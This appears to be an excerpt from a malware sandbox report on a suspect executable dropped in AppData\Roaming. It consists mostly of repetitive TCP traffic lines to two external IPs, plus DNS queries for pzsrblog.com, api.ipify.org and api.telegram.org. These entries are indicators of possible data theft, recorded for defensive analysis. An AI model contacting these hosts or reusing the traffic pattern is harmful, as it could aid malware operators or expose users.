Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718

Source: global traffic	DNS query: name: pzsrblog.com
Source: global traffic	DNS query: name: pzsrblog.com
Source: global traffic	DNS query: name: pzsrblog.com
Source: global traffic	DNS query: name: api.ipify.org
Source: global traffic	DNS query: name: api.ipify.org
Source: global traffic	DNS query: name: api.telegram.org
Source: global traffic	DNS query: name: api.ipify.org
Source: global traffic	DNS query: name: api.ipify.org
Source: global traffic	DNS query: name: api.telegram.org

Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		15_2_08C3B280
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h		15_2_08C3D808

Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49724 -> 64.185.227.156:443
Source: global traffic	TCP traffic: 192.168.2.5:49727 -> 64.185.227.156:443
Source: global traffic	TCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49708 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
